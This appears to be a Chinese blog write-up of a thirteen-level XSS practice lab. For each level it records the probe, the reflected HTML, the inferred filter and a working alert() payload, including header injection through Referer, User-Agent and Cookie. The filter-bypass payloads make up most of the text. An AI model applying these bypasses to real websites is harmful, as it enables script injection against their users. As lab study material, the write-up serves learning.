XSS挑战

#Hacker #渗透测试 #安全 #XSS #笔记

地址 : XSS之旅或 XSS之旅

level1

<'"/\> ---> 未过滤

?name=<script>alert(/xss/)</script>

控制台: javascript:alert(/xss/) 通关所有

level2

<script "'Oonn>
- <input name=keyword value="<script "'Oonn>"> ---> "> 闭合
payload: "><img onerror=alert(/xss/) src="# ----> 闭合前,闭合后
- <input name=keyword value=""><img onerror=alert(/xss/) src="#">

level3

<script "'Oonn>
- <input name=keyword value='<script "'Oonn>'> ---> "、 < 、> 转码
payload: ' onmouseover='alert(/xss/)
- <input name=keyword value='' onmouseover='alert(/xss/)'>

level4

<script "'Oonn>
- <input name=keyword value="script "'Oonn"> ---> < 、>过滤 , " 闭合
payload : " onmouseover="alert(/xss/)
- <input name=keyword value="" onmouseover="alert(/xss/)">

level5

<script script "'Oonn>
- <input name=keyword value="<scr_ipt script "'oo_nn>"> ---> <script 替换，On 替换
payload : "><a href="javascript:alert(/xss/)">click me!</a>
- <input name=keyword value=""><a href="javascript:alert(/xss/)">click me!</a>">

level6

<script script "'OOnn>
- <input name=keyword value="<scr_ipt script "'OOnn>"> ---> <script 替换,未做大小写替换
payload : " Onmouseover="alert(/xss/)
- <input name=keyword value="" Onmouseover="alert(/xss/)">
payload : "><a hREf="javascript:alert(/xss/)">click me!</a>
- <input name=keyword value=""><a hREf="javascript:alert(/xss/)">click me!</a>">

level7

<script script "'OOnn>
- <input name=keyword value="< "'on>"> --> <script 、script 过滤，On 一次过滤
payload : " OOnnmouseover="alert(/xss/)
- <input name=keyword value="" OOnnmouseover="alert(/xss/)">

level8

<script script "'OOnn>
- </center><center><BR><a href="<scr_ipt scr_ipt &quot'oo_nn>">友情链接</a></center><center><img src=level8.jpg></center> ---> <script 、script 、on 替换， " 转码
javascript:alert(/xss/) ---> c > c
- </center><center><BR><a href="javas&ript:alert(/xss/)">友情链接</a></center><center><img src=level8.jpg></center>

level9

<script script "'OOnn>
- </center><center><BR><a href="您的链接不合法？有没有！">友情链接</a></center><center><img src=level9.png></center> ---> 检测链接合法性
<script script "'OOnn>http:// 猜测其检测方式，只要包含有 http:// 就合法
- </center><center><BR><a href="<scr_ipt scr_ipt &quot'oo_nn>http://">友情链接</a></center><center><img src=level9.png></center>
payload : javascript:alert('http://')
- </center><center><BR><a href="javas&ript:alert('http://')">友情链接</a></center><center><img src=level8.jpg></center>

level10

?keyword=<script script "'OOnn> ---> 无可用内容
?t_link=<script script "'OOnn>
- <input name="t_link" value="" type="hidden">
?t_history=<script script "'OOnn>
- <input name="t_history" value="" type="hidden">
?t_sort=<script script "'OOnn>
- <input name="t_sort" value="script script "'OOnn" type="hidden"> ---> < 、> 过滤
payload : ?t_sort=click me!" type="button" onclick="alert(/xss/)
- <input name="t_sort" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">

level11

<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_ref" value="http://test.ctf8.com/level10.php?t_sort=click%20me!%22%20type=%22button%22%20onclick=%22alert(/xss/)" type="hidden">

t_ref 的值为 Referer 参数

拦截请求包修改：

Referer: <script script "'OOnn>
- <input name="t_ref" value="script script "'OOnn" type="hidden">
payload : Referer: click me!" type="button" onclick="alert(/xss/)
- <input name="t_ref" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">

level12

<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.5.810 Yowser/2.5 Safari/537.36" type="hidden">

t_ua 的值为 User-Agent 参数

拦截请求包修改：

User-Agent: <script script "'OOnn>
- <input name="t_ua" value="script script "'OOnn" type="hidden">
payload : User-Agent: click me!" type="button" onclick="alert(/xss/)
- <input name="t_ua" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">

level13

<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="" type="hidden">
<input name="t_cook" value="" type="hidden">

猜测 t_cook 值为 Cookie 的参数

拦截请求包修改：

Cookie: <script script "'OOnn>
- <input name="t_cook" value="script script "'OOnn" type="hidden">
payload : Cookie: click me!" type="button" onclick="alert(/xss/)
- <input name="t_cook" value="click me!" type="button" onclick="alert(/xss/)" type="hidden">